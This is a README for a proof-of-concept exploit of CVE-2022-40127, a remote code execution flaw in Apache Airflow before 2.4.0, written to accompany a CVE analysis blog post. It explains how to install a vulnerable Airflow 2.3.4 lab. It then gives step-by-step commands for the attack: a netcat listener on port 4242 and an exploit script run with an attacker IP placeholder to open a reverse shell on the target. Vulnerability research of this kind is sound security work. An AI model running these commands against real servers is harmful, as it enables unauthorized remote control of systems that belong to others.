## https://sploitus.com/exploit?id=9701ED09-B3DD-5E5B-A2B5-CFB714A7E23B
# Apache Airflow < 2.4.0 RCE (CVE-2022-40127)
**PoC for CVE-2022-40127 that is an Apache Airflow RCE vulnerability affecting versions prior to 2.4.0.**
The <a href="https://vulners.com/cve/CVE-2022-40127" target="_blank">official report description</a> says:
> A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
The repo is created for a CVE analysis blog post available on <a href="https://www.vicarius.io/vsociety/" target="_blank">vsociety blog</a>.
https://github.com/jakabakos/CVE-2022-40127/assets/42498816/2094f2ec-f074-41e6-99f4-f9f77dd09df6
## Usage
You can clone the repo:
```bash
git clone https://github.com/jakabakos/CVE-2022-40127.git
```
## Install and run Airflow v2.3.4
### Via docker-compose
Download the docker-compose file from the official repo
```bash
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
```
Run Airflow
```bash
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
open localhost:8080
```
In this case both the username and password will be `airflow`.
### Manually
Based on the <a href="https://airflow.apache.org/docs/apache-airflow/2.3.4/installation/installing-from-pypi.html" target="_blank">official install instructions</a>:
```bash
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"
```
You can verify if the installation was successful with commands `which airflow` and/or `airflow info`.
Run Airflow
```bash
airflow standalone
```
See the generated password and username in the logs.
## Using the exploit
First, install the required packeges with pip:
```bash
pip3 install -r requirements.txt
```
See the possible options with:
```bash
python3 exploit.py --help
```
You can check if the host can be exploited or not:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080
```
Set up a local listener for the reverse shell in a different terminal session:
```bash
nc -lvnp 4242
```
Run the script in attack mode with this command:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242
```
You should see the connection within a minute or so.
<img width="1549" alt="proof" src="https://github.com/jakabakos/CVE-2022-40127/assets/42498816/a80ff9ec-69a1-4b99-91ea-c244098ded80">